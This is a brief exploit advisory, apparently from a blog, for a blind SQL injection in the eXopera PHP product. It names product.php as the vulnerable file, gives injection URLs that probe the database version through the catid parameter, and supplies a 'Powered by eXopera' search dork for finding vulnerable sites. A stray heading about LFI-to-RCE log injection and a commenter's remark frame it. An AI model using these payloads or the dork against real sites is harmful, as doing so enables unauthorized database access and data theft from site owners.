LFI to RCE via access_log injection

eXopera Blind SQL Injection Vuln


[o] eXopera Blind SQL Injection Vulnerability

Software : eXopera
Vendor : http://www.exopera.be/
Author : NoGe


[o] Vulnerable file
product.php


[o] Exploit
http://localhost/[path]/product.php?catid=[SQL]
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=4
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by eXopera"


[o] Note
this a private script


Comments

labatterie said…
I use image to post the source coz blogspot dont allow it...